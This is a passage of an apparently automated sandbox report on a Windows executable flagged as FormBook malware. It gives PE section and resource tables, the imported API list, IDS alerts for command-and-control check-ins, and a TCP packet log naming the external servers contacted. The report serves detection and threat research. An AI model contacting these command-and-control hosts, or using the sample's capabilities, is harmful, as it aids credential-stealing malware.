IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	d28a820a1d9ff26cda02d12b888ba4b4	False	0.5728679102422908	data	6.676118058520316	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x553c0	0x55400	3292fb3113a6e06f126effa896fbd452	False	0.923369913856305	data	7.882930384006404	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x11d000	0x711c	0x7200	6fcae3cbbf6bfbabf5ec5bbe7cf612c3	False	0.7650767543859649	data	6.779031650454199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc75a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc76d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc77f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc7920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc7c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc7d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc8bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc9480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc99e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xcbf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xcd038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xcd4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xcd4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcda84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xce110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xce5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xceb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcf1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcf660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcf7b8	0x4c686	data			1.0003386949381083
RT_GROUP_ICON	0x11be40	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x11beb8	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x11becc	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x11bee0	0x14	data	English	Great Britain	1.25
RT_VERSION	0x11bef4	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x11bfd0	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T00:07:12.189690+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.6	49988	104.21.32.1	80	TCP
2025-01-11T00:07:35.804186+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.6	49992	64.46.102.238	80	TCP
2025-01-11T00:07:49.174389+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.6	49997	104.21.32.1	80	TCP
2025-01-11T00:08:02.399400+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.6	50001	13.248.169.48	80	TCP
2025-01-11T00:08:16.172945+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.6	50005	103.249.106.91	80	TCP
2025-01-11T00:08:29.676763+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.6	50009	69.57.163.64	80	TCP
2025-01-11T00:08:43.185400+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.6	50013	173.208.249.155	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 00:07:11.513706923 CET	49988	80	192.168.2.6	104.21.32.1
Jan 11, 2025 00:07:11.518604994 CET	80	49988	104.21.32.1	192.168.2.6
Jan 11, 2025 00:07:11.518702984 CET	49988	80	192.168.2.6	104.21.32.1
Jan 11, 2025 00:07:11.527493954 CET	49988	80	192.168.2.6	104.21.32.1
Jan 11, 2025 00:07:11.532289982 CET	80	49988	104.21.32.1	192.168.2.6
Jan 11, 2025 00:07:12.188328028 CET	80	49988	104.21.32.1	192.168.2.6
Jan 11, 2025 00:07:12.189625025 CET	80	49988	104.21.32.1	192.168.2.6
Jan 11, 2025 00:07:12.189645052 CET	80	49988	104.21.32.1	192.168.2.6
Jan 11, 2025 00:07:12.189690113 CET	49988	80	192.168.2.6	104.21.32.1
Jan 11, 2025 00:07:12.189853907 CET	80	49988	104.21.32.1	192.168.2.6
Jan 11, 2025 00:07:12.189898014 CET	49988	80	192.168.2.6	104.21.32.1
Jan 11, 2025 00:07:12.193710089 CET	49988	80	192.168.2.6	104.21.32.1
Jan 11, 2025 00:07:12.198561907 CET	80	49988	104.21.32.1	192.168.2.6
Jan 11, 2025 00:07:27.673614025 CET	49989	80	192.168.2.6	64.46.102.238
Jan 11, 2025 00:07:27.678625107 CET	80	49989	64.46.102.238	192.168.2.6
Jan 11, 2025 00:07:27.678778887 CET	49989	80	192.168.2.6	64.46.102.238
Jan 11, 2025 00:07:27.693006039 CET	49989	80	192.168.2.6	64.46.102.238
Jan 11, 2025 00:07:27.698038101 CET	80	49989	64.46.102.238	192.168.2.6
Jan 11, 2025 00:07:28.128205061 CET	80	49989	64.46.102.238	192.168.2.6
Jan 11, 2025 00:07:28.128230095 CET	80	49989	64.46.102.238	192.168.2.6
Jan 11, 2025 00:07:28.128294945 CET	49989	80	192.168.2.6	64.46.102.238
Jan 11, 2025 00:07:29.216166973 CET	49989	80	192.168.2.6	64.46.102.238
Jan 11, 2025 00:07:30.230086088 CET	49990	80	192.168.2.6	64.46.102.238
Jan 11, 2025 00:07:30.235013008 CET	80	49990	64.46.102.238	192.168.2.6
Jan 11, 2025 00:07:30.235110044 CET	49990	80	192.168.2.6	64.46.102.238
Jan 11, 2025 00:07:30.250699997 CET	49990	80	192.168.2.6	64.46.102.238
Jan 11, 2025 00:07:30.255624056 CET	80	49990	64.46.102.238	192.168.2.6
Jan 11, 2025 00:07:30.679147959 CET	80	49990	64.46.102.238	192.168.2.6
Jan 11, 2025 00:07:30.679188967 CET	80	49990	64.46.102.238	192.168.2.6
Jan 11, 2025 00:07:30.679416895 CET	49990	80	192.168.2.6	64.46.102.238
Jan 11, 2025 00:07:31.766609907 CET	49990	80	192.168.2.6	64.46.102.238
Jan 11, 2025 00:07:32.785419941 CET	49991	80	192.168.2.6	64.46.102.238
Jan 11, 2025 00:07:32.790352106 CET	80	49991	64.46.102.238	192.168.2.6
Jan 11, 2025 00:07:32.790441036 CET	49991	80	192.168.2.6	64.46.102.238
Jan 11, 2025 00:07:32.805454016 CET	49991	80	192.168.2.6	64.46.102.238
Jan 11, 2025 00:07:32.810370922 CET	80	49991	64.46.102.238	192.168.2.6
Jan 11, 2025 00:07:32.810445070 CET	80	49991	64.46.102.238	192.168.2.6
Jan 11, 2025 00:07:33.246545076 CET	80	49991	64.46.102.238	192.168.2.6
Jan 11, 2025 00:07:33.246689081 CET	80	49991	64.46.102.238	192.168.2.6
Jan 11, 2025 00:07:33.246753931 CET	49991	80	192.168.2.6	64.46.102.238
Jan 11, 2025 00:07:34.313580990 CET	49991	80	192.168.2.6	64.46.102.238
Jan 11, 2025 00:07:35.331572056 CET	49992	80	192.168.2.6	64.46.102.238
Jan 11, 2025 00:07:35.336565018 CET	80	49992	64.46.102.238	192.168.2.6
Jan 11, 2025 00:07:35.336639881 CET	49992	80	192.168.2.6	64.46.102.238
Jan 11, 2025 00:07:35.345196962 CET	49992	80	192.168.2.6	64.46.102.238
Jan 11, 2025 00:07:35.350001097 CET	80	49992	64.46.102.238	192.168.2.6
Jan 11, 2025 00:07:35.803757906 CET	80	49992	64.46.102.238	192.168.2.6
Jan 11, 2025 00:07:35.803910971 CET	80	49992	64.46.102.238	192.168.2.6
Jan 11, 2025 00:07:35.804186106 CET	49992	80	192.168.2.6	64.46.102.238
Jan 11, 2025 00:07:35.806652069 CET	49992	80	192.168.2.6	64.46.102.238
Jan 11, 2025 00:07:35.811434031 CET	80	49992	64.46.102.238	192.168.2.6
Jan 11, 2025 00:07:40.847444057 CET	49993	80	192.168.2.6	104.21.32.1
Jan 11, 2025 00:07:40.852560043 CET	80	49993	104.21.32.1	192.168.2.6
Jan 11, 2025 00:07:40.852760077 CET	49993	80	192.168.2.6	104.21.32.1
Jan 11, 2025 00:07:40.865463018 CET	49993	80	192.168.2.6	104.21.32.1
Jan 11, 2025 00:07:40.870528936 CET	80	49993	104.21.32.1	192.168.2.6
Jan 11, 2025 00:07:41.468499899 CET	80	49993	104.21.32.1	192.168.2.6
Jan 11, 2025 00:07:41.468594074 CET	80	49993	104.21.32.1	192.168.2.6
Jan 11, 2025 00:07:41.468703032 CET	49993	80	192.168.2.6	104.21.32.1
Jan 11, 2025 00:07:42.385868073 CET	49993	80	192.168.2.6	104.21.32.1
Jan 11, 2025 00:07:43.415189981 CET	49994	80	192.168.2.6	104.21.32.1
Jan 11, 2025 00:07:43.420203924 CET	80	49994	104.21.32.1	192.168.2.6
Jan 11, 2025 00:07:43.420312881 CET	49994	80	192.168.2.6	104.21.32.1
Jan 11, 2025 00:07:43.439460993 CET	49994	80	192.168.2.6	104.21.32.1
Jan 11, 2025 00:07:43.444356918 CET	80	49994	104.21.32.1	192.168.2.6
Jan 11, 2025 00:07:44.014473915 CET	80	49994	104.21.32.1	192.168.2.6
Jan 11, 2025 00:07:44.015369892 CET	80	49994	104.21.32.1	192.168.2.6
Jan 11, 2025 00:07:44.015461922 CET	49994	80	192.168.2.6	104.21.32.1
Jan 11, 2025 00:07:44.954113007 CET	49994	80	192.168.2.6	104.21.32.1
Jan 11, 2025 00:07:45.974297047 CET	49996	80	192.168.2.6	104.21.32.1
Jan 11, 2025 00:07:45.979249954 CET	80	49996	104.21.32.1	192.168.2.6
Jan 11, 2025 00:07:45.981035948 CET	49996	80	192.168.2.6	104.21.32.1
Jan 11, 2025 00:07:45.999769926 CET	49996	80	192.168.2.6	104.21.32.1
Jan 11, 2025 00:07:46.004817009 CET	80	49996	104.21.32.1	192.168.2.6
Jan 11, 2025 00:07:46.004952908 CET	80	49996	104.21.32.1	192.168.2.6
Jan 11, 2025 00:07:46.582110882 CET	80	49996	104.21.32.1	192.168.2.6
Jan 11, 2025 00:07:46.582686901 CET	80	49996	104.21.32.1	192.168.2.6
Jan 11, 2025 00:07:46.582771063 CET	49996	80	192.168.2.6	104.21.32.1
Jan 11, 2025 00:07:47.516554117 CET	49996	80	192.168.2.6	104.21.32.1
Jan 11, 2025 00:07:48.537441969 CET	49997	80	192.168.2.6	104.21.32.1
Jan 11, 2025 00:07:48.542730093 CET	80	49997	104.21.32.1	192.168.2.6
Jan 11, 2025 00:07:48.542874098 CET	49997	80	192.168.2.6	104.21.32.1
Jan 11, 2025 00:07:48.551901102 CET	49997	80	192.168.2.6	104.21.32.1
Jan 11, 2025 00:07:48.556804895 CET	80	49997	104.21.32.1	192.168.2.6
Jan 11, 2025 00:07:49.174200058 CET	80	49997	104.21.32.1	192.168.2.6
Jan 11, 2025 00:07:49.174221039 CET	80	49997	104.21.32.1	192.168.2.6
Jan 11, 2025 00:07:49.174388885 CET	49997	80	192.168.2.6	104.21.32.1
Jan 11, 2025 00:07:49.179291964 CET	49997	80	192.168.2.6	104.21.32.1
Jan 11, 2025 00:07:49.184139967 CET	80	49997	104.21.32.1	192.168.2.6
Jan 11, 2025 00:07:54.261734962 CET	49998	80	192.168.2.6	13.248.169.48
Jan 11, 2025 00:07:54.266639948 CET	80	49998	13.248.169.48	192.168.2.6
Jan 11, 2025 00:07:54.266772985 CET	49998	80	192.168.2.6	13.248.169.48
Jan 11, 2025 00:07:54.281536102 CET	49998	80	192.168.2.6	13.248.169.48
Jan 11, 2025 00:07:54.286391973 CET	80	49998	13.248.169.48	192.168.2.6
Jan 11, 2025 00:07:54.722337008 CET	80	49998	13.248.169.48	192.168.2.6
Jan 11, 2025 00:07:54.722500086 CET	80	49998	13.248.169.48	192.168.2.6
Jan 11, 2025 00:07:54.722556114 CET	49998	80	192.168.2.6	13.248.169.48
Jan 11, 2025 00:07:55.797975063 CET	49998	80	192.168.2.6	13.248.169.48
Jan 11, 2025 00:07:56.817339897 CET	49999	80	192.168.2.6	13.248.169.48
Jan 11, 2025 00:07:56.824219942 CET	80	49999	13.248.169.48	192.168.2.6
Jan 11, 2025 00:07:56.824340105 CET	49999	80	192.168.2.6	13.248.169.48
Jan 11, 2025 00:07:56.838872910 CET	49999	80	192.168.2.6	13.248.169.48
Jan 11, 2025 00:07:56.843769073 CET	80	49999	13.248.169.48	192.168.2.6
Jan 11, 2025 00:07:58.344700098 CET	49999	80	192.168.2.6	13.248.169.48
Jan 11, 2025 00:07:58.392077923 CET	80	49999	13.248.169.48	192.168.2.6
Jan 11, 2025 00:07:59.379026890 CET	50000	80	192.168.2.6	13.248.169.48
Jan 11, 2025 00:07:59.383867025 CET	80	50000	13.248.169.48	192.168.2.6
Jan 11, 2025 00:07:59.383958101 CET	50000	80	192.168.2.6	13.248.169.48
Jan 11, 2025 00:07:59.398936033 CET	50000	80	192.168.2.6	13.248.169.48
Jan 11, 2025 00:07:59.403786898 CET	80	50000	13.248.169.48	192.168.2.6
Jan 11, 2025 00:07:59.403877020 CET	80	50000	13.248.169.48	192.168.2.6
Jan 11, 2025 00:07:59.839626074 CET	80	50000	13.248.169.48	192.168.2.6
Jan 11, 2025 00:07:59.839708090 CET	80	50000	13.248.169.48	192.168.2.6
Jan 11, 2025 00:07:59.839761019 CET	50000	80	192.168.2.6	13.248.169.48
Jan 11, 2025 00:08:00.907488108 CET	50000	80	192.168.2.6	13.248.169.48
Jan 11, 2025 00:08:01.925954103 CET	50001	80	192.168.2.6	13.248.169.48
Jan 11, 2025 00:08:01.930732012 CET	80	50001	13.248.169.48	192.168.2.6
Jan 11, 2025 00:08:01.930872917 CET	50001	80	192.168.2.6	13.248.169.48
Jan 11, 2025 00:08:01.940201044 CET	50001	80	192.168.2.6	13.248.169.48
Jan 11, 2025 00:08:01.945075035 CET	80	50001	13.248.169.48	192.168.2.6
Jan 11, 2025 00:08:02.399178028 CET	80	50001	13.248.169.48	192.168.2.6
Jan 11, 2025 00:08:02.399235964 CET	80	50001	13.248.169.48	192.168.2.6
Jan 11, 2025 00:08:02.399399996 CET	50001	80	192.168.2.6	13.248.169.48
Jan 11, 2025 00:08:02.402194977 CET	50001	80	192.168.2.6	13.248.169.48
Jan 11, 2025 00:08:02.406943083 CET	80	50001	13.248.169.48	192.168.2.6
Jan 11, 2025 00:08:07.448988914 CET	50002	80	192.168.2.6	103.249.106.91
Jan 11, 2025 00:08:07.453883886 CET	80	50002	103.249.106.91	192.168.2.6
Jan 11, 2025 00:08:07.454066038 CET	50002	80	192.168.2.6	103.249.106.91
Jan 11, 2025 00:08:07.469392061 CET	50002	80	192.168.2.6	103.249.106.91
Jan 11, 2025 00:08:07.474313974 CET	80	50002	103.249.106.91	192.168.2.6
Jan 11, 2025 00:08:08.374489069 CET	80	50002	103.249.106.91	192.168.2.6
Jan 11, 2025 00:08:08.374581099 CET	80	50002	103.249.106.91	192.168.2.6
Jan 11, 2025 00:08:08.374692917 CET	50002	80	192.168.2.6	103.249.106.91
Jan 11, 2025 00:08:08.985302925 CET	50002	80	192.168.2.6	103.249.106.91
Jan 11, 2025 00:08:10.004585981 CET	50003	80	192.168.2.6	103.249.106.91
Jan 11, 2025 00:08:10.011593103 CET	80	50003	103.249.106.91	192.168.2.6
Jan 11, 2025 00:08:10.011730909 CET	50003	80	192.168.2.6	103.249.106.91
Jan 11, 2025 00:08:10.026108980 CET	50003	80	192.168.2.6	103.249.106.91
Jan 11, 2025 00:08:10.030976057 CET	80	50003	103.249.106.91	192.168.2.6
Jan 11, 2025 00:08:10.914371014 CET	80	50003	103.249.106.91	192.168.2.6
Jan 11, 2025 00:08:10.914479971 CET	80	50003	103.249.106.91	192.168.2.6
Jan 11, 2025 00:08:10.914556980 CET	50003	80	192.168.2.6	103.249.106.91
Jan 11, 2025 00:08:11.532300949 CET	50003	80	192.168.2.6	103.249.106.91
Jan 11, 2025 00:08:12.551023960 CET	50004	80	192.168.2.6	103.249.106.91
Jan 11, 2025 00:08:12.556158066 CET	80	50004	103.249.106.91	192.168.2.6
Jan 11, 2025 00:08:12.556279898 CET	50004	80	192.168.2.6	103.249.106.91
Jan 11, 2025 00:08:12.571090937 CET	50004	80	192.168.2.6	103.249.106.91
Jan 11, 2025 00:08:12.575957060 CET	80	50004	103.249.106.91	192.168.2.6
Jan 11, 2025 00:08:12.576143980 CET	80	50004	103.249.106.91	192.168.2.6
Jan 11, 2025 00:08:13.466995001 CET	80	50004	103.249.106.91	192.168.2.6
Jan 11, 2025 00:08:13.467101097 CET	80	50004	103.249.106.91	192.168.2.6
Jan 11, 2025 00:08:13.467175961 CET	50004	80	192.168.2.6	103.249.106.91
Jan 11, 2025 00:08:14.079138041 CET	50004	80	192.168.2.6	103.249.106.91
Jan 11, 2025 00:08:15.098073959 CET	50005	80	192.168.2.6	103.249.106.91
Jan 11, 2025 00:08:15.103039980 CET	80	50005	103.249.106.91	192.168.2.6
Jan 11, 2025 00:08:15.103132010 CET	50005	80	192.168.2.6	103.249.106.91
Jan 11, 2025 00:08:15.112289906 CET	50005	80	192.168.2.6	103.249.106.91
Jan 11, 2025 00:08:15.117247105 CET	80	50005	103.249.106.91	192.168.2.6
Jan 11, 2025 00:08:16.172775984 CET	80	50005	103.249.106.91	192.168.2.6
Jan 11, 2025 00:08:16.172806025 CET	80	50005	103.249.106.91	192.168.2.6
